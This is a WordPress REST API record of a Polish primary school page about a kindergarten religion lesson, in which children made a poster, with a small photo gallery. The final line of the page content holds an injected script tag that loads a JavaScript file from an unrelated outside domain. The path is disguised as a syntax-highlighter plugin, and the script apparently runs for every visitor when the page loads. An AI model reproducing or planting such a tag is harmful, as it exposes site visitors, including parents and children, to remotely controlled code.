{"id":14525,"date":"2020-02-03T22:01:07","date_gmt":"2020-02-03T21:01:07","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=14525"},"modified":"2020-04-01T03:44:24","modified_gmt":"2020-04-01T01:44:24","slug":"kosciol-to-nasz-drugi-dom","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/ciekawe-zajecia\/kosciol-to-nasz-drugi-dom\/","title":{"rendered":"Ko\u015bci\u00f3\u0142 to nasz drugi dom"},"content":{"rendered":"<p>Religia w klasie &#8222;0&#8221;<\/p>\n<div dir=\"auto\">&#8222;Ko\u015bci\u00f3\u0142-nasz drugi dom&#8221; to temat zaj\u0119\u0107 ostatniej katechezy w &#8222;zer\u00f3wce&#8221;. Dzieci wykona\u0142y plakat, ucz\u0105c si\u0119 wsp\u00f3\u0142dzia\u0142a\u0107 w grupie.<\/div>\n<div dir=\"auto\">\n<div id='gallery-1' class='gallery galleryid-14525 gallery-columns-2 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_114557.jpg\" title=\"IMG_20200131_114557\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_114557-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_114653.jpg\" title=\"IMG_20200131_114653\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_114653-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_115926.jpg\" title=\"IMG_20200131_115926\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_115926-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_120603.jpg\" title=\"IMG_20200131_120603\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2020\/02\/IMG_20200131_120603-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<\/div>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Religia w klasie &#8222;0&#8221; &#8222;Ko\u015bci\u00f3\u0142-nasz drugi dom&#8221; to temat zaj\u0119\u0107 ostatniej katechezy w &#8222;zer\u00f3wce&#8221;. Dzieci wykona\u0142y plakat, ucz\u0105c si\u0119 wsp\u00f3\u0142dzia\u0142a\u0107 w grupie.<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":12376,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14525"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=14525"}],"version-history":[{"count":4,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14525\/revisions"}],"predecessor-version":[{"id":14941,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14525\/revisions\/14941"}],"up":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12376"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=14525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}